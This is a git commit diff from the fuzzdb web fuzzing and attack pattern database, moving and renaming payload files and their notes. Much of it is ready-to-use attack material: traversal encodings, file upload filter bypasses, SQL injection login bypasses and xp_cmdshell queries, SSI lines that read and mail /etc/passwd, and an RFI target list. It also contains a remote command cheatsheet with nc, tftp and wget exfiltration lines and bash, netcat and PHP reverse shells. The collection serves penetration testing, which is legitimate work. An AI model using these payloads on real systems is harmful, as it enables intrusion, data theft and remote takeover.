doc relocation and renaming update

This commit is contained in:
Adam Muntner 2015-09-11 19:39:11 -04:00
parent b3e506dab1
commit a58bdb659d
1318 changed files with 323 additions and 182163 deletions

BIN
._readme.txt.kate-swp Normal file

Binary file not shown.

4
.directory Normal file
View file

@ -0,0 +1,4 @@
[Dolphin]
Timestamp=2015,9,11,16,15,10
Version=3
ViewMode=1

View file

@ -1,4 +1,4 @@
Copyright (c) 2010-2013, Adam Muntner
Copyright (c) 2010-2015, Adam Muntner
All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:

View file

@ -1,61 +0,0 @@
fuzzdb: Web Fuzzing Discovery and Attack Pattern Database
****Introduction
Too much new software is vulnerable to the attack sequences of yesteryear. This suggests a testing approach: a comprehensive set of known attack pattern sequences can be leveraged for use in targeted fuzzing when testing for exploitable conditions in new applications.
This is especially useful for many filter bypass type exploits. Identical encoding sequences have been observed to bypass filters for more than one application. Examples can be observed in categories including xss, sqli, evil script upload, OS command execution, traversal issues, directory indexing bugs, source code revealing vulnerabilities, etc. In recent times, for example, new embedded webservers were discovered to be vulnerable to directory traversal issues triggered by encodings that exploited Microsoft IIS in 2000.
This approach is also useful for targeted use of brute force for discovery using, for example, lists of known vulnerable scripts sorted by platform type, default locations of critical files of popular apps, high quality lists of common directory names.
Primary sources used for attack pattern research:
-researching old web exploits for repeatable attack strings
-penetration tests i've performed in the past
-scraping scanner patterns from my own http logs
-various books, articles, blog posts
-documentation for popular applications
-analysis of default application installs
notable sources and other contributors:
-metasploit wmap http://www.metasploit.com/redmine/projects/framework/wiki/WMAP
-dirb http://www.open-labs.org/
-jbrofuzz http://www.owasp.org/index.php/Category:OWASP_JBroFuzz
-skipfish http://code.google.com/p/skipfish/
-rsnake's xss and rfi files http://ha.ckers.org/
-michael daw's web shell archive http://michaeldaw.org/
-joseph giron (joseph.giron13 (at) gmail.com)
-ron gutierrez - html tags and javascript events
-analysis of default app installs
-lists already submitted to OWASP Fuzzing Code DB by Wagner Elias, Eduardo Neves, Ulisses Castro, Adam Muntner http://www.owasp.org/index.php/Category:OWASP_Fuzzing_Code_Database#tab=News
Some files are derived primarily from other fuzzers, and are credited in the files with comments formatted like:
# This file is primarily derived from source xyz
Others have additional instructions for payload use in a similar comment format at the top of the file
****Download
Check out via svn:
svn checkout http://fuzzdb.googlecode.com/svn/trunk/ fuzzdb-read-only
Or, pick from a plethora of available svn clients: http://en.wikipedia.org/wiki/Comparison_of_Subversion_clients
Tarballs are available for download, but may not be as fresh as whats in the svn repo.
Browse the repo http://code.google.com/p/fuzzdb/source/browse/#svn/trunk
****Usage
I primarily use fuzzdb in the excellent OWASP ZAP (https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project) and in Burp Suite Pro (http://portswigger.net/suite/), however, it can be used in any web application/service fault injection tool, for manual testing as an interesting source of test cases for fuzzing binary applications, in IDS signatures, and more.
****Who
This SVN repository and the files were assembled by Adam Muntner who works as a Security Engineer at Mozilla Corp.
contact: unix23 (@) gmail.com

View file

@ -1,8 +0,0 @@
# single directory traversals that have caused showcode or command exec issues in the past
# GET /path/*payload*relative/path/to/target/file/
..%255c
.%5c../..%5c
/..%c0%9v../
/..%c0%af../
/..%255c..%255c

View file

@ -1,12 +0,0 @@
# known cross platform source Code, file disclosure attack patterns - append after file or dir path
%70
.%E2%73%70
%2e0
%2e
.
\
?*
%20
%00
%2f
%5c

View file

@ -1,9 +0,0 @@
# {ASPSCRIPT}gets regex replaced with the shell or other file you are trying to upload, {EXT} should be brute-forced with payloads from discovery/filename-bruteforce/file-extensions/, since some file upload types may be allowed that are not listed.
{ASPSCRIPT}
{ASPSCRIPT}.{EXT}
{ASPSCRIPT};
{ASPSCRIPT};.{EXT}
{ASPSCRIPT}%00
{ASPSCRIPT}%00.{EXT}
{ASPSCRIPT}::data%00.
{ASPSCRIPT}::data%00.{EXT}

View file

@ -1,11 +0,0 @@
# Another test: use exiftool http://www.sno.phy.queensu.ca/~phil/exiftool/ to create a .jpg image with the meta comment field set to:
# -----
#<?php phpinfo(); ?>
#-----
{PHPSCRIPT}
{PHPSCRIPT}.phtml
{PHPSCRIPT}.php.html
{PHPSCRIPT}.php::$DATA
{PHPSCRIPT}.php.php.rar
{PHPSCRIPT}.php.rar
{PHPSCRIPT}::$DATA

View file

@ -1,9 +0,0 @@
# Another test: use exiftool http://www.sno.phy.queensu.ca/~phil/exiftool/ to create a .jpg image with the meta comment field set to:
# -----
# your own payload, or <?php phpinfo(); ?>
#-----
{PHPSCRIPT}
{PHPSCRIPT}.phtml
{PHPSCRIPT}.php.html
{PHPSCRIPT}.php.php.rar
{PHPSCRIPT}.php.rar

View file

@ -1,32 +0,0 @@
# File Upload Fuzzfile 1.0 - File Name Filter Bypass
# creative commons license http://creativecommons.org/licenses/by/3.0/
# see:
# http://cwe.mitre.org/data/definitions/434.html
# projurl
# For MIME filter bypass, your shellscript should look like
# -------
# GIF89aP;
# [shell]
# -------
#
# Check to see if there are no extension checks at all
#
# Check to see if the file upload protection is client side only.
#
# For mod_cgi Server Side Include upload attacks:
#<!--#exec cmd="ls" -->
#
#or, on Windows
#
#<!--#exec cmd="dir" -->
#
# Sometimes you can overwrite .htaccess in an upload folder on Apache httpd, if so,
# try setting .jpg to executable. If you can set the target directory, try fuzz the
# list of all dirs you've enumerated on the servers, and try the commonly writable directory fuzzfile.
#
# example .htaccess that sets mime type .jpg to be executable:
# -----
# AddType application/x-httpd-php .jpg
# -----

View file

@ -1,2 +0,0 @@
# Invalid filenames - these can be used to attempt to cause an error condition during file upload bypass attempts which might reveal an absolute path. Useful if you're not sure where your files are landing.

View file

@ -1,14 +0,0 @@
# list of invalid characters for windows filesystem - these can be used to attempt to cause an error condition during file upload bypass attempts which might reveal an absolute path. Useful if you're not sure where your files are landing.
# fuzz these into a filename during upload attempts
*
.
"
/
\
[
]
:
;
|
=
,

View file

@ -1,27 +0,0 @@
\boot.ini
\WINDOWS\win.ini
\WINNT\win.ini
\WINDOWS\Repair\SAM
\WINDOWS\php.ini
\WINDOWS\system32\drivers\etc\hosts
\WINNT\php.ini
\php\php.ini
\php5\php.ini
\php4\php.ini
\apache\php\php.ini
\xampp\apache\bin\php.ini
\home2\bin\stable\apache\php.ini
\home\bin\stable\apache\php.ini
\Program Files\Apache Group\Apache\logs\access.log
\Program Files\Apache Group\Apache\logs\error.log
\Program Files\Apache Group\Apache\conf\httpd.conf
\Program Files\Apache Group\Apache2\conf\httpd.conf
\Program Files\xampp\apache\conf\httpd.conf
\Program Files\FileZilla Server\FileZilla Server.xml
\Program Files (x86)\Apache Group\Apache\logs\access.log
\Program Files (x86)\Apache Group\Apache\logs\error.log
\Program Files (x86)\Apache Group\Apache\conf\httpd.conf
\Program Files (x86)\Apache Group\Apache2\conf\httpd.conf
\Program Files (x86)\xampp\apache\conf\httpd.conf
\Program Files (x86)\FileZilla Server\FileZilla Server.xml
\AppServ\MySQL\data\mysql\user.MYD

View file

@ -1,3 +0,0 @@
other tools:
fimap http://code.google.com/p/fimap/

View file

@ -1,4 +0,0 @@
# list of potentially useful dos commands to fuzz inside an os command execution bug
ver
chdir
echo %USERNAME%

View file

@ -1,8 +0,0 @@
# single directory traversals that have caused showcode or command exec issues in the past
# GET /path/*payload*relative/path/to/target/file/
..%255c
.%5c../..%5c
/..%c0%9v../
/..%c0%af../
/..%255c..%255c

View file

@ -1,3 +0,0 @@
Other tools:
fimap http://code.google.com/p/fimap/

View file

@ -1,8 +0,0 @@
# regex replace as many as you can with your fuzzer for best results:
# <user-fieldname> <pass-fieldname> <username>
# also try to brute force a list of possible usernames, including possile admin acct names
<username>' OR 1=1--
'OR '' = ' Allows authentication without a valid username.
<username>'--
' union select 1, '<user-fieldname>', '<pass-fieldname>' 1--
'OR 1=1--

5
attack/.directory Normal file
View file

@ -0,0 +1,5 @@
[Dolphin]
HeaderColumnWidths=288,60,115
Timestamp=2015,9,11,16,20,26
Version=3
ViewMode=1

View file

@ -0,0 +1,4 @@
[Dolphin]
Timestamp=2015,9,11,16,22,7
Version=3
ViewMode=1

View file

@ -1,4 +1,3 @@
# based on list by Joseph Giron http://www.wtfchan.org/~evil1/Web-Shells-rev2.pdf
/apache/logs/error.log
/apache/logs/access.log
/apache/logs/error.log

View file

@ -0,0 +1,13 @@
Notes:
source-disc-cmd-exec-traversal.txt
single directory traversals that have caused showcode or command exec issues in the past
GET /path/*payload*relative/path/to/target/file/
source-disclosure-generic.txt
known cross platform source Code, file disclosure attack patterns - append after file or dir path
source-disclosure-microsoft.txt
microsoft-specific - appends after filename - try the generic list for microsoft, too

View file

@ -0,0 +1,6 @@
..%255c
.%5c../..%5c
/..%c0%9v../
/..%c0%af../
/..%255c..%255c

View file

@ -0,0 +1,11 @@
%70
.%E2%73%70
%2e0
%2e
.
\
?*
%20
%00
%2f
%5c

View file

@ -20,4 +20,8 @@ jacco\ van"someting"tuijl\example@address.com
“email”@address.com
sql"or"1"="1"or"test@email.com
sql'or'1'='1'or'test@email.com
xss"><script>alert(1)</script><"test@address.com
xss"><script>alert(1)</script><"test@address.com
a"b(c)d,e:f;g<h>i[j\k]l@example.com
this is"not\allowed@example.com
notallowed@example.com
notallowed@example.com

View file

@ -0,0 +1,4 @@
[Dolphin]
Timestamp=2015,9,11,17,25,0
Version=3
ViewMode=1

View file

@ -0,0 +1,74 @@
# File Upload Fuzzfiles- File Name Filter Bypass Notes
see: http://cwe.mitre.org/data/definitions/434.html
# kinds of file upload verifications:
# content-type
# filename extension verificationi (whitelist, blacklist)
# file content checking
# client side, ha ha ha
File notes:
alt-extensions-asp.fuzz.txt
alt-extensions-coldfusion.fuzz.txt
alt-extensions-jsp.fuzz.txt
alt-extensions-perl.fuzz.txt
alt-extensions-php.fuzz.txt
# Alternative ways of expressing file extensions that will be interpreted correctly by the target filesystem/app and can be used to bypass blacklist filters
file-ul-filter-bypass-commonly-writable-directories.fuzz.txt
# File directory names that experience has shown are often writable
file-ul-filter-bypass-microsoft-asp-filetype-bf.fuzz.txt
# {ASPSCRIPT}gets regex replaced with the shell or other file you are trying to upload, {EXT} should be brute-forced with payloads from discovery/filename-bruteforce/file-extensions/, since some file upload types may be allowed that are not listed.
file-ul-filter-bypass-microsoft-asp.fuzz.txt
# this file contains a number of common predictable values. Add more if other file types are allowed, or use the filetype-bf version of this fuzzfile - {ASPSCRIPT} gets regex replaced.
file-ul-filter-bypass-ms-php.fuzz.txt
file-ul-filter-bypass-x-platform-php.fuzz.txt
# php on microsoft, cross-platform. use both on ms.
# Use exiftool http://www.sno.phy.queensu.ca/~phil/exiftool/ to create a .jpg image with the meta comment field set to:
# -----
#<?php phpinfo(); ?>
#-----
# then regex replace {PHPSCRIPT} with the name of your .jpg file in the target directory
invalid-filenames-microsoft.fuzz.txt
# Useful for causing error messages that contain an absolute drivepath, such as if you don't know where the file uploader puts files
# regex replace {EXT} with allowed extension type
file-ul-filter-bypass-x-platform-generic.fuzz.txt
# These might bypass a file upload blacklist but be written in a way that leaves them executable because of the filetype
# regex replace {PHPSCRIPT} with your script name
invalid-filenames-linux.fuzz.txt
# invalid filenames under linux, and since there aren't too many of those, other filepaths that may cause problems. # these can be used to attempt to cause an error condition during file upload bypass attempts which might reveal an absolute path. Useful if you're not sure where your files are landing.
invalid-filesystem-chars-microsoft.fuzz.txt
# list of invalid characters for windows filesystem - these can be used to attempt to cause an error condition during file upload bypass attempts which might reveal an absolute path. Useful if you're not sure where your files are landing.
# fuzz these into a filename during upload attempts
## Addtl Tips:
# For mod_cgi Server Side Include upload attacks:
<!--#exec cmd="ls" -->
# or, on Windows
<!--#exec cmd="dir" -->
# Sometimes you can overwrite .htaccess in an upload folder on Apache httpd, if so,
# try setting jpg mimetype handler to executable. If you can set the target directory, try to fuzz the
# list of all dirs you've enumerated on the servers, and try the commonly writable directory fuzzfile.
# example .htaccess entry that sets mime type .jpg to be executable:
-----
AddType application/x-httpd-php .jpg
-----

View file

@ -0,0 +1,8 @@
{ASPSCRIPT}
{ASPSCRIPT}.{EXT}
{ASPSCRIPT};
{ASPSCRIPT};.{EXT}
{ASPSCRIPT}%00
{ASPSCRIPT}%00.{EXT}
{ASPSCRIPT}::data%00.
{ASPSCRIPT}::data%00.{EXT}

View file

@ -1,4 +1,3 @@
# this file contains a number of common predictable values. Add more if other file ttypes are allowed, or use the filetype-bf version of this fuzzfile
{ASPSCRIPT}
{ASPSCRIPT};
{ASPSCRIPT};.jpg

View file

@ -0,0 +1,7 @@
{PHPSCRIPT}
{PHPSCRIPT}.phtml
{PHPSCRIPT}.php.html
{PHPSCRIPT}.php::$DATA
{PHPSCRIPT}.php.php.rar
{PHPSCRIPT}.php.rar
{PHPSCRIPT}::$DATA

View file

@ -0,0 +1,5 @@
{PHPSCRIPT}
{PHPSCRIPT}.phtml
{PHPSCRIPT}.php.html
{PHPSCRIPT}.php.php.rar
{PHPSCRIPT}.php.rar

View file

@ -0,0 +1,7 @@
/
\0
/dev/null
/dev/null/foo
.
..

View file

@ -1,5 +1,3 @@
# Useful for causing error messages that contain an absolute drivepath, such as if you don't know where the file uploader puts files
# regex replace {EXT} with allowed extension type
CON.{EXT}
PRN.{EXT}
AUX.{EXT}

View file

@ -0,0 +1,12 @@
*
.
"
/
\
[
]
:
;
|
=
,

View file

@ -1,4 +1,3 @@
# derived from fuzz file by Foobar@email.de
%s%p%x%d
%p%p%p%p
%x%x%x%x

View file

@ -1,4 +1,3 @@
# integer overflows from jbrofuzz
-1
0
0x100

17
attack/lfi/README.md Normal file
View file

@ -0,0 +1,17 @@
LFI - Local File Include attacks
To exploit an LFI bug, you need to be able to write code to a local file and call it from the include. HTTPD log files are a location that is typically writable.
common-unix-httpd-log-locations.fuzz.txt
# To exploit a lfi bug, you have to get code into a local file. This list contains a list of common unix logfile locations based on common packages formats.
common-windows-httpd-log-locations.fuzz.txt
# To exploit a lfi bug, you have to get code into a local file. This list contains a list of common windows logfile locations based on common packages formats.
For more details:
http://www.wtfchan.org/~evil1/Web-Shells-rev2.pdf
other tools:
fimap http://code.google.com/p/fimap/

View file

@ -0,0 +1,6 @@
\Program Files\Apache Group\Apache\logs\access.log
\Program Files\Apache Group\Apache\logs\error.log
\Program Files\Apache Group\Apache\conf\httpd.conf
\Program Files\Apache Group\Apache2\conf\httpd.conf
\Program Files (x86)\Apache Group\Apache\logs\access.log
\Program Files (x86)\Apache Group\Apache\logs\error.log

View file

@ -1,4 +1,3 @@
# based on list by Joseph Giron http://www.wtfchan.org/~evil1/Web-Shells-rev2.pdf
/apache/logs/error.log
/apache/logs/access.log
/apache/logs/error.log

View file

@ -0,0 +1,4 @@
[Dolphin]
Timestamp=2015,9,11,18,18,9
Version=3
ViewMode=1

View file

@ -1,10 +1,63 @@
One-liner reverse shells...
Remote Command Exec Cheatsheet
File notes:
source-disc-cmd-exec-traversal.fuzz.txt
# single directory traversals that have caused showcode or command exec issues in the past
# GET /path/*payload*relative/path/to/target/file/
Executing Commands
Seperating Commands:
blah;blah2
PIPEZ:
blah ^ blah2
AND:
blah && blah2
OR:
FAIL || X
OR:
blah%0Dblah2%0Dblah3
Backtick:
`blah`
Background:
`blah & blah2`
Exfiltrating Files / Data
FTP:
Make a new text file, and echo and then redirect to FTP
NC:
nc -e /bin/sh
NC:
echo /etc/passwd | nc host port
TFTP:
echo put /etc/passwd | tftp host
WGET:
wget --post-file /etc/passwd
One-Liner Reverse Shells
On the listener:
$ nc -l -p 8080 -vvv
On the remote host...
Bash:
$ bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
@ -25,7 +78,6 @@ $ php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
(Assumes TCP uses file descriptor 3. It it doesn't work, try 4,5, or 6)
Netcat:
$ nc -e /bin/sh 10.0.0.1 1234
$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
@ -39,3 +91,4 @@ $ xhost +targetip
More docs: /docs/attack-docs/remote-cmd-exfiltration/

View file

@ -0,0 +1,6 @@
..%255c
.%5c../..%5c
/..%c0%9v../
/..%c0%af../
/..%255c..%255c

View file

@ -1,4 +1,3 @@
# list of potentially useful unix commands to fuzz inside an os command execution bug
uname -n -s
whoami
pwd

View file

@ -0,0 +1,3 @@
ver
chdir
echo %USERNAME%

View file

@ -0,0 +1,4 @@
traversals-8-deep-exotic-encoding.fuzz.txt
# Use Regex to replace {FILE} with your target filename

View file

@ -1,6 +1,3 @@
# Derived from the awesome "Directory Traversal Fuzzing Code" v0.2 by Luca Carettoni
# Did some cleanup & removed anything to the right of {FILE} for inclusion in a
# separate fuzzfile for more flexibiity
/../{FILE}
/../../{FILE}
/../../../{FILE}

14
attack/rfi/README.md Normal file
View file

@ -0,0 +1,14 @@
rfi.fuzz.txt
# Compiled by RSnake 02/01/2010 Mostly from milw0rm osvdb.org and elsewhere.
# Change XXpathXX to the path of your backdoor. Note that you may need to
# try it against every directory on the target and because of how this was
# culled you may need to add a question mark to your own XXpathXX URL:
# Eg: XXpathXX => http://www.example.com/hax.txt?
see:
/docs/attack-docs/rfi-cheatsheet.html
Other tools:
fimap http://code.google.com/p/fimap/

View file

@ -1,8 +1,3 @@
# Compiled by RSnake 02/01/2010 Mostly from milw0rm osvdb.org and elsewhere.
# Change XXpathXX to the path of your backdoor. Note that you may need to
# try it against every directory on the target and because of how this was
# culled you may need to add a question mark to your own XXpathXX URL:
# Eg: XXpathXX => http://www.example.com/hax.txt?
/0_admin/modules/Wochenkarte/frontend/index.php?x_admindir=XXpathXX?
/123flashchat.php?e107path=XXpathXX
/2007/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=XXpathXX

View file

@ -1,5 +1,4 @@
# includes work by Foobar@email.de
<!--#exec cmd="/bin/ls /" --><br/>
<!--#exec cmd="cat /etc/passwd" --><br/>
<!--#exec cmd="find / -name *.* -print" --><br/>
<!--#exec cmd="mail Foobar@email.de <mailto:Foobar@email.de> < cat /etc/passwd" --><br/>
<!--#exec cmd="mail email@dom.tld <mailto:email@dom.tld> < cat /etc/passwd" --><br/>

View file

@ -1,4 +1,3 @@
# from wapiti
sleep(__TIME__)#
1 or sleep(__TIME__)#
" or sleep(__TIME__)#

View file

@ -1,4 +1,3 @@
# you will need to customize/modify some of the vaules in the queries for best effect
'; exec master..xp_cmdshell 'ping 10.10.1.2'--
'create user name identified by 'pass123' --
'create user name identified by pass123 temporary tablespace temp default tablespace users;

View file

@ -1,4 +1,3 @@
# contains statements from jbrofuzz (13 April 2010)
'; if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:2' --
'; if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:2' --
'; if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:2' --

View file

@ -1,4 +1,3 @@
# Contains statements from jbrofuzz (13 April 2010)
1
1 and user_name() = 'dbo'
\'; desc users; --

View file

@ -0,0 +1,9 @@
MSSQL.fuzz.txt
# you will need to customize/modify some of the vaules in the queries for best effect

View file

@ -1,4 +1,3 @@
# contains statements from jbrofuzz
or 1=1
' or '1'='1
'||utl_http.request('httP://192.168.1.1/')||'

View file

@ -1,5 +1,3 @@
# to attempt with ids/waf evasion try like
# /index.aspx?page=select 1&page=2,3 from table where id=1
<>"'%;)(&+
|
!

View file

@ -0,0 +1,18 @@
various useful post-exploitation commands
ms-sql-enumeration.fuzz.txt
# ms-sqli info disclosure payload fuzzfile
# replace regex with your fuzzer for best results <attackerip> <sharename>
# run wireshark or tcpdump, look for incoming smb or icmp packets from victim
# might need to terminate payloads with ;--
mysql-injection-login-bypass.fuzz.txt
# regex replace as many as you can with your fuzzer for best results:
# <user-fieldname> <pass-fieldname> <username>
# also try to brute force a list of possible usernames, including possile admin acct names
mysql-read-local-files.fuzz.txt
# mysql local file disclosure through sqli
# fuzz interesting absolute filepath/filename into <filepath>

Some files were not shown because too many files have changed in this diff Show more